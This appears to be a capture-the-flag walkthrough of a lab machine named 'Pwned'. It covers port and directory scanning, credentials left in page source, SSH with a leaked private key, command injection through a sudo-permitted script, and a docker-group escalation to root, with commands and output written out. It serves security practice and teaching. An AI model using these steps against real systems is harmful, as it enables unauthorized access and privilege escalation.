Initial Enumeration and User Shell
I started the enumeration by running a port scan using nmap to look for open ports and default scripts.
┌──(madhav㉿anton)-[~/Documents/hmv/pwned] └─$ nmap -sC -sV -oN nmap/initial 192.168.1.2 Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-13 15:43 IST Nmap scan report for 192.168.1.2 Host is up (0.0013s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA) | 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA) |_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Pwned....!! Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.34 seconds
We have three different ports open. I started the enumeration with port 80. So Let's open our web browser and see what's running on port 80.
There was nothing interesting on the home page, So I performed a gobuster scan to look for hidden files and directories.
┌──(madhav㉿anton)-[~/Documents/hmv/pwned] └─$ gobuster dir -u http://192.168.1.2 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.1.2 [+] Method: GET [+] Threads: 10 [+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2020/12/13 15:44:09 Starting gobuster in directory enumeration mode =============================================================== /nothing (Status: 301) [Size: 312] [--> http://192.168.1.2/nothing/] /server-status (Status: 403) [Size: 276] /hidden_text (Status: 301) [Size: 316] [--> http://192.168.1.2/hidden_text/] =============================================================== 2020/12/13 15:45:09 Finished ===============================================================
We have to two interesting directories, the
/nothing directory did not contain anything useful but
/hidden_text is a directory listing and I found a wordlist named
I downloaded the
secret.dic and again performed a gobuster scan using this wordlist.
┌──(madhav㉿anton)-[~/Documents/hmv/pwned] └─$ gobuster dir -u http://192.168.1.2 -w secret.dic =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.1.2 [+] Method: GET [+] Threads: 10 [+] Wordlist: secret.dic [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2020/12/13 15:45:52 Starting gobuster in directory enumeration mode =============================================================== //pwned.vuln (Status: 301) [Size: 315] [--> http://192.168.1.2/pwned.vuln/] =============================================================== 2020/12/13 15:45:52 Finished ===============================================================
We found another directory named
/pwned.vuln. It contains a login page, and looking at the source code we can see login credentials.
I used these credentials to login via FTP and found a directory named
share. Inside the directory, there were two files named
note.txt. I download both of them to my local machine.
id_rsa contains the private RSA key for some user but we don't know the username. That was not difficult to guess, it was present the
┌──(madhav㉿anton)-[~/Documents/hmv/pwned] └─$ cat note.txt Wow you are here ariana won't happy about this note sorry ariana :(
We can now login as user
ariana via SSH using the private RSA key and read our first flag.
┌──(madhav㉿anton)-[~/Documents/hmv/pwned] └─$ ssh -i id_rsa email@example.com Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70 ariana@pwned:~$ ls ariana-personal.diary user1.txt ariana@pwned:~$ wc -c user1.txt 143 user1.txt
Next, I used
sudo -l command and found that user
ariana can run a script present in the home directory as user
ariana@pwned:~$ sudo -l Matching Defaults entries for ariana on pwned: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User ariana may run the following commands on pwned: (selena) NOPASSWD: /home/messenger.sh
Next, I enumerated the
/home/messenger.sh and found that this script executes the vaule we enter for
ariana@pwned:~$ cat /home/messenger.sh #!/bin/bash clear echo "Welcome to linux.messenger " echo "" users=$(cat /etc/passwd | grep home | cut -d/ -f 3) echo "" echo "$users" echo "" read -p "Enter username to send message : " name echo "" read -p "Enter message for $name :" msg echo "" echo "Sending message to $name " $msg 2> /dev/null echo "" echo "Message sent to $name :) " echo ""
So, first I executed the script using the following command:
ariana@pwned:~$ sudo -u selena /home/messenger.sh
After that, I typed and
bash in both the fields and I got a shell as user
Welcome to linux.messenger ariana: selena: ftpuser: Enter username to send message : bash Enter message for bash :bash Sending message to bash id uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
Now we can read our second flag present in the home directory.
python3 -c 'import pty;pty.spawn("/bin/bash")' selena@pwned:~$ ls selena-personal.diary user2.txt selena@pwned:~$ wc -c user2.txt 100 user2.txt
Also, by executing the id command, I found that this user is added to the docker group. We can get a root shell my mounting the
/ directory to a docker container. I searched on GTFO Bins and found the exact command.
selena@pwned:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh # id uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
We are now root and can read our final flag present in
# cd /root # cat root.txt You found me. i dont't expect this （◎ . ◎） I am Ajay (Annlynn) i hacked your server left and this for you. I trapped Ariana and Selena to takeover your server :) You Pwned the Pwned congratulations :) share the screen shot or flags to given contact details for confirmation Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g Instgarm ajs_walker Twitter Ajs_walker
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Akshar Pathak.